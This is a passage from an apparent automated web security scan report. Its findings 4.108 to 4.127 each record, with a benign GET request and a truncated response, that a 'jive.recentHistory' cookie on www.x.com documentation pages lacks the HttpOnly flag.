Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313631333b3130322c313337323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:47 GMT; Path=/
Vary: User-Agent
JP: D=254809 t=1313157226947806
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.108. https://www.x.com/docs/DOC-2241

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-2241

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-2241 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:02 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c323234313b3130322c333237313b3130322c333332313b3130322c333335323b3130322c333332323b3130322c333335313b3130322c333335333b3130322c333335343b3130322c333335353b3130322c333334353b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:02 GMT; Path=/
Vary: User-Agent
JP: D=129237 t=1313157242766813
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.109. https://www.x.com/docs/DOC-2346

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-2346

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-2346 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c323334363b3130322c313433313b3130322c313130363b3130322c313337343b3130322c313333323b3130322c313034313b3130322c313130383b3130322c333833363b3130322c313535313b3130322c333230313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:11 GMT; Path=/
Vary: User-Agent
JP: D=90261 t=1313157251251583
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.110. https://www.x.com/docs/DOC-3201

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3201

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3201 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333230313b3130322c333332313b3130322c323234313b3130322c333237313b3130322c333332323b3130322c313535313b3130322c333335313b3130322c333335323b3130322c333335333b3130322c333335343b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:04 GMT; Path=/
Vary: User-Agent
JP: D=167625 t=1313157243865563
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.111. https://www.x.com/docs/DOC-3212

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3212

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3212 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333231323b3130322c333337313b3130322c333337323b3130322c333337343b3130322c333337333b3130322c333235313b3130322c333337353b3130322c333433313b3130322c333432363b3130322c333432373b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:57 GMT; Path=/
Vary: User-Agent
JP: D=98683 t=1313157237758028
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.112. https://www.x.com/docs/DOC-3251

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3251

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3251 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:55 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333235313b3130322c333432373b3130322c333337353b3130322c333432363b3130322c333433313b3130322c333434333b3130322c333439313b3130322c333434343b3130322c333536313b3130322c333536323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:55 GMT; Path=/
Vary: User-Agent
JP: D=152122 t=1313157235677820
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.113. https://www.x.com/docs/DOC-3271

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3271

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3271 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:02 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333237313b3130322c333335333b3130322c333332313b3130322c333332323b3130322c333335323b3130322c333335313b3130322c333335343b3130322c333335353b3130322c333334353b3130322c333332333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:02 GMT; Path=/
Vary: User-Agent
JP: D=202196 t=1313157242055016
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.114. https://www.x.com/docs/DOC-3321

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3321

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3321 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:00 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333332313b3130322c333332323b3130322c333335323b3130322c333335333b3130322c333335313b3130322c333335343b3130322c333335353b3130322c333334353b3130322c333332333b3130322c333231323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:01 GMT; Path=/
Vary: User-Agent
JP: D=175031 t=1313157241647991
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.115. https://www.x.com/docs/DOC-3322

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3322

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3322 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:00 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333332323b3130322c333335313b3130322c333335353b3130322c333335323b3130322c333335343b3130322c333335333b3130322c333334353b3130322c333332333b3130322c333231323b3130322c333337313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:01 GMT; Path=/
Vary: User-Agent
JP: D=109738 t=1313157241231678
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.116. https://www.x.com/docs/DOC-3323

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3323

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3323 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333332333b3130322c333231323b3130322c333337313b3130322c333337343b3130322c333337323b3130322c333337333b3130322c333235313b3130322c333337353b3130322c333433313b3130322c333432363b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:58 GMT; Path=/
Vary: User-Agent
JP: D=133918 t=1313157238141945
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.117. https://www.x.com/docs/DOC-3345

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3345

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3345 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333334353b3130322c333337313b3130322c333231323b3130322c333337323b3130322c333337333b3130322c333332333b3130322c333337343b3130322c333235313b3130322c333337353b3130322c333433313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:58 GMT; Path=/
Vary: User-Agent
JP: D=125907 t=1313157238612169
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.118. https://www.x.com/docs/DOC-3351

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3351

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3351 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:59 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333335313b3130322c333335323b3130322c333335333b3130322c333334353b3130322c333335343b3130322c333335353b3130322c333332333b3130322c333231323b3130322c333337313b3130322c333337323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:00 GMT; Path=/
Vary: User-Agent
JP: D=138250 t=1313157240721784
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.119. https://www.x.com/docs/DOC-3352

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3352

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3352 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:59 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333335323b3130322c333335333b3130322c333332333b3130322c333335343b3130322c333334353b3130322c333335353b3130322c333231323b3130322c333337313b3130322c333337323b3130322c333337333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:00 GMT; Path=/
Vary: User-Agent
JP: D=134617 t=1313157240348745
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.120. https://www.x.com/docs/DOC-3353

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3353

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3353 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:59 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333335333b3130322c333335343b3130322c333334353b3130322c333335353b3130322c333332333b3130322c333231323b3130322c333337313b3130322c333337323b3130322c333337333b3130322c333337343b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:00 GMT; Path=/
Vary: User-Agent
JP: D=99945 t=1313157239993132
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.121. https://www.x.com/docs/DOC-3354

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3354

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3354 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:58 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333335343b3130322c333335353b3130322c333337313b3130322c333332333b3130322c333334353b3130322c333231323b3130322c333337323b3130322c333337333b3130322c333337343b3130322c333235313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:59 GMT; Path=/
Vary: User-Agent
JP: D=125676 t=1313157239533114
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.122. https://www.x.com/docs/DOC-3355

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3355

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3355 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:58 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333335353b3130322c333334353b3130322c333231323b3130322c333332333b3130322c333337313b3130322c333337333b3130322c333337323b3130322c333337343b3130322c333235313b3130322c333337353b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:59 GMT; Path=/
Vary: User-Agent
JP: D=160248 t=1313157238946488
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.123. https://www.x.com/docs/DOC-3371

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3371

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3371 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:56 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333337313b3130322c333337323b3130322c333337333b3130322c333337343b3130322c333235313b3130322c333337353b3130322c333433313b3130322c333432363b3130322c333432373b3130322c333434333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:57 GMT; Path=/
Vary: User-Agent
JP: D=131293 t=1313157237278257
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.124. https://www.x.com/docs/DOC-3372

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3372

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3372 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:56 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333337323b3130322c333337333b3130322c333337353b3130322c333235313b3130322c333337343b3130322c333433313b3130322c333432363b3130322c333432373b3130322c333434333b3130322c333439313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:57 GMT; Path=/
Vary: User-Agent
JP: D=129449 t=1313157236932252
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.125. https://www.x.com/docs/DOC-3373

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3373

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3373 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:55 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333337333b3130322c333337343b3130322c333235313b3130322c333337353b3130322c333433313b3130322c333432363b3130322c333432373b3130322c333434333b3130322c333439313b3130322c333434343b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:56 GMT; Path=/
Vary: User-Agent
JP: D=131465 t=1313157236591127
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.126. https://www.x.com/docs/DOC-3374

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3374

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3374 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:55 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333337343b3130322c333235313b3130322c333432363b3130322c333337353b3130322c333433313b3130322c333432373b3130322c333434333b3130322c333439313b3130322c333434343b3130322c333536313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:56 GMT; Path=/
Vary: User-Agent
JP: D=102916 t=1313157236205992
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.127. https://www.x.com/docs/DOC-3375

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3375

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3375 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:54 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
